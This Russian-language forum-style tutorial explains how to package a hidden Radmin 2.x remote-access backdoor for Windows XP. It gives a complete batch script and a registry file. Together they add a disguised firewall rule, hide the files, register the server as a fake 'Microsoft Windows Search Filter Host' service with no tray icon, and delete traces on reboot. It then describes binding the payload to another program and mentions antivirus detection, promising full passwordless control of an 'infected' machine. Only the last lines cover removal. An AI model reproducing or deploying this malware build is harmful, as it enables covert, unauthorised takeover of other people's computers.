В это статье будет описываться как собрать сборку радмина 2* версий и будут переведены ссылки на компоненты Radmin Server в двух вариантах,одни компоненты паляться практически всеми антивирусами,а другие паляться лишь не многими антивирусами(само собой ссылка на них будет под хайдом).
Данная сборка будет актуальна для версий Windows не позже Xp,то есть на висту или 7 уже не покатит,так как встроенный защитник Windows её обнаружит и удалит, практически сразу после перезапуска системы.
Для сборки радмина нужны несколько файлов от самой программы Radmin Server 2* версий ( r_server.exe,raddrv.dll и admdll.dll),батинок и ключ реестра.
Компоненты радмина можете скачать здесь: Сборка Radmin Server v2.2
Собственно в архиве уже есть батинок и ключ реестра,но вы можете также сами собрать эти файлы от радмина,для этого вам нужно будет установить радмин сервер 2.* версий(3* уже не покатит) и собрать компоненты сами,которые будут находится в папке C:\Program Files\Radmin,от туда скопируете три файла r_server.exe,raddrv.dll и admdll.dll.
Собственно можете настроить пароль и порт на подключение и извлечь ключ реестра который будет находится по пути HKEY_LOCAL_MACHINE\SYSTEM\RAdmin.
Далее берёте батинок:
chcp 1251 netsh advfirewall firewall add rule name="Хост-процесс для служб Windows" dir=in program="%SystemRoot%\wincs.exe" reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\r_server" /f attrib +h +s +r "%windir%\wincs.exe" attrib +h +s +r "%windir%\raddrv.dll" attrib +h +s +r "%windir%\admdll.dll" reg import 1.reg echo echo off> %Temp%\fast.bat echo del /s /q %windir%\wesf.exe>null>> %Temp%\fast.bat echo del /s /q %0>null>> %Temp%\fast.bat del /s /q 1.reg reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "winsystem" /t REG_SZ /d "%Temp%\fast.bat" /f exit
Ну не много распишу его содержимое:
chcp 1251 - Это для того чтобы командная строка Windows понимала кирилицу,то есть руские символы и только.
netsh advfirewall firewall add rule name="Хост-процесс для служб Windows" dir=in program="%SystemRoot%\wincs.exe" - эта строка добавляет в доверенные стандартного брэндмауера
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f - эта строка удаляет ключ реестра радмина,в которой находятся его настройки,то есть пароль,порт и т.д.
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\r_server" /f - эта строка удаляет ключ реестра,в котором записан радмин сервер как сервисное приложение.
attrib +h +s +r "%windir%\wincs.exe" - эта строка ставит атрибуты на сам сервер wincs.exe
attrib +h +s +r "%windir%\raddrv.dll"- эта строка ставит атрибуты на raddrv.dll
attrib +h +s +r "%windir%\admdll.dll"- эта строка ставит атрибуты на admdll.dll
reg import 1.reg - эта строка импортирует наш рег файл в реестр
echo echo off> %Temp%\fast.bat - эта строка создаёт бат файл fast.bat во временной директории и вписывает в него команду которая скроет содержимое при его выполнение.
echo del /s /q %windir%\wesf.exe>null>> %Temp%\fast.bat - эта строка добавляет строку в уже созданный ранее батинок fast.bat,которая удалит выполняемый при запуске вируса батинок wesf.exe
echo del /s /q %0>null>> %Temp%\fast.bat - эта строка добавляет строку в тот же батинок на самоудаление.
del /s /q 1.reg - эта строка удаляет уже внесённый в реестр ключ
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "winsystem" /t REG_SZ /d "%Temp%\fast.bat" /f - эта строка добавляет в автозагрузку созданный ранее батинок,который удалит этот батинок и самого себя,именно по этому он добавляется в эту ветку,так как после перезагрузки системы эта ветка сама очищается,то есть батинок запустится удалит все файлы и самого себя и так же автоматом удалится параметр в реестре который его запустит.
exit - это завершение процесса батинка и выход из него.
Называете его wesf.bat и компилите в exe (о том как и чем компилировать батинок в exe файл можете прочитать тут ),далее берёте reg файл:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\r_server] "Type"=dword:00000110 "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):22,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,\ 6f,00,74,00,25,00,5c,00,77,00,69,00,6e,00,63,00,73,00,2e,00,65,00,78,00,65,\ 00,22,00,20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00 "DisplayName"="Microsoft Windows Search Filter Host" "ObjectName"="LocalSystem"
То есть копируете в тектовый редактор и сохраняете как 1.reg (расширение файла должно быть reg),собираете все вместе в одной папке и клеите в один исполняемый файл,можете так же склеить с какой нибудь программой( о том как склеить в один исполняемый файл можете прочитать тут),если вы устанавливали сервер радмина и сами извлекали из него файлы,то вам нужно будет переименовать файл r_server.exe в wincs.exe,так же если вы используете свой рег файл тогда вам нужно будет только часть этого регфайла,а именно начиная со строки [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\r_server],при склейки на выполнение ставите wesf.exe,путь выгрузки %WindowsDir% и всё,после перезагрузки системы вы будете иметь полный контроль над зараженной тачкой.Пароля на конект не будет,порт на конект по дефолту.
Чтобы избавится от данной сборки (или какой другой сборки радмина) достаточно удалить два ключа реестра [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\r_server] и [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin],а так же сами файлы радмина,ну в принципе достаточно будет ключей реестра.
На этом в принципе всё,всего доброго!
